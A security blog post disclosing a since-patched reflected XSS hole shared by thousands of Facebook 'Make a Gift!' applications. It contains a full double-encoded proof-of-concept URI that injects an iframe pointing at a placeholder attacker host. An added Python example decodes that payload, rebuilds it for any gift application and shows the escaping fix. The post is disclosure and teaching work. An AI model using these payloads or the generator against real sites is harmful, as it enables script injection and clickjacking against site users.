(This makes up for Monday’s FAXX Hack absence.)
Several Facebook applications exist to generate other Facebook applications. For example, “Make a Gift!” lets users create applications for sending themed virtual gifts to friends. The user specifies various custom parameters for their new application, but the actual code stays hosted by the original application.
This means, though, that a vulnerability in the shared codebase applies to every application built on it. Case in point: earlier this week, I discovered an XSS hole in Make a Gift! applications. As an example, this URI demonstrates the hole for the Friends! gift application:
http://apps.facebook.com/friendsbghdkbhfbpgkg/?target=calendar-w&month=10&year=2009)%22%3E%3C%2Fa%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fgifts.applatform.com%2Fa%2F1673%2F%3Fajax%3D1%26target%3Dcalendar-w%26month%3D10%26year%3D2009)%2522%253E%253C%252Fa%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E
To launch an attack against another gift application, one need only change the canvas URI and the 4-digit number in the gifts.applatform.com URI. The largest applications I know of built with Make a Gift! are Friends! (2,135,691 monthly active users) and Birthday (2,993,635 monthly active users). From browsing the Make a Gift! application, I counted at least 9,689 applications built using it, and the above vulnerability applied to every one of them. The hole could also be used for a clickjacking install.
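The URI above is really two reflected injections nested one inside the other, which is why part of it is double-encoded (%2522 rather than %22). Reading the payload: the year parameter is reflected inside a double-quoted attribute of an <a> element on the canvas page; `)"></a>` ends that attribute value and closes the element, and the injected <fb:iframe> (FBML, rendered by the canvas as a real iframe) loads the application's own gifts.applatform.com page with the same breakout, where a plain <iframe src="http://EVILURI/"> is injected. The Python below is an added example of my own, not code from the post or from Make a Gift!: it peels those layers apart, rebuilds the URI for a given canvas slug and applatform.com application number (the two values the preceding paragraph says change between gift applications), and shows the attribute escaping that would have neutralised it. The slug, the number 1673 and the EVILURI placeholder are taken from the post's URI; the unescaped-attribute reading of the reflection point is my inference from the payload, not something the post states.

```python
"""Pull apart and rebuild the nested Make a Gift! XSS payload.

Added example by the editor; not code from the post or from Make a Gift!.
"""
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Proof-of-concept URI exactly as it appears in the post.
POC_URI = (
    "http://apps.facebook.com/friendsbghdkbhfbpgkg/?target=calendar-w"
    "&month=10&year=2009)%22%3E%3C%2Fa%3E%3Cfb%3Aiframe+src%3D%22http%3A"
    "%2F%2Fgifts.applatform.com%2Fa%2F1673%2F%3Fajax%3D1%26target%3D"
    "calendar-w%26month%3D10%26year%3D2009)%2522%253E%253C%252Fa%253E"
    "%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E"
    "%22%3E"
)

# Ends the double-quoted attribute value the `year` parameter is reflected
# into and closes the <a> element around it (my reading of the payload).
BREAKOUT = ')"></a>'


def decode_layers(uri):
    """Decode the payload one URL-encoding layer at a time.

    Returns (outer_markup, inner_src, inner_markup): what the canvas page
    reflects for `year`, the fb:iframe src that markup injects, and what the
    gifts.applatform.com page reflects for its own `year` parameter.
    """
    outer_markup = parse_qs(urlparse(uri).query)["year"][0]
    match = re.search(r'<fb:iframe src="([^"]*)">', outer_markup)
    if match is None:
        raise ValueError("reflected value does not carry an fb:iframe")
    inner_src = match.group(1)
    inner_markup = parse_qs(urlparse(inner_src).query)["year"][0]
    return outer_markup, inner_src, inner_markup


def build_poc(canvas_slug, app_id, evil_uri):
    """Rebuild the payload for another Make a Gift! application.

    Only the canvas slug and the four-digit applatform.com application
    number change between gift applications. The inner URI is built first
    so its breakout gets URL-encoded twice, exactly as in the published PoC.
    """
    inner_params = {
        "ajax": "1", "target": "calendar-w", "month": "10",
        "year": "2009" + BREAKOUT + f'<iframe src="{evil_uri}">',
    }
    # safe=")" keeps the parenthesis literal, matching the post's encoding.
    inner_src = (f"http://gifts.applatform.com/a/{app_id}/?"
                 + urlencode(inner_params, safe=")"))
    outer_params = {
        "target": "calendar-w", "month": "10",
        "year": "2009" + BREAKOUT + f'<fb:iframe src="{inner_src}">',
    }
    return (f"http://apps.facebook.com/{canvas_slug}/?"
            + urlencode(outer_params, safe=")"))


def attribute_safe(value):
    """The fix the shared codebase needed at the reflection point: HTML-escape
    the value before placing it in the attribute, so the quote in the
    breakout never closes it and the injected tags never become markup.
    """
    return html.escape(value, quote=True)


if __name__ == "__main__":
    outer, src, inner = decode_layers(POC_URI)
    print("canvas page reflects :", outer)
    print("fb:iframe loads      :", src)
    print("applatform reflects  :", inner)
    print("escaped, it is inert :", attribute_safe(inner))
    # The rebuilt URI for the Friends! application is byte-identical to the post's.
    assert build_poc("friendsbghdkbhfbpgkg", "1673", "http://EVILURI/") == POC_URI
```

Running it prints the three decoded layers and confirms that build_poc reproduces the post's URI byte for byte; swapping in another application's canvas slug and applatform.com number is the one-line change the post describes. Because the fix belongs in the shared codebase, escaping at that single reflection point closes the hole for every application generated from it.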
I did not have a direct contact for the developer of the Make a Gift! application, but I notified Facebook and they passed on word. Fortunately, the codebase was patched fairly quickly.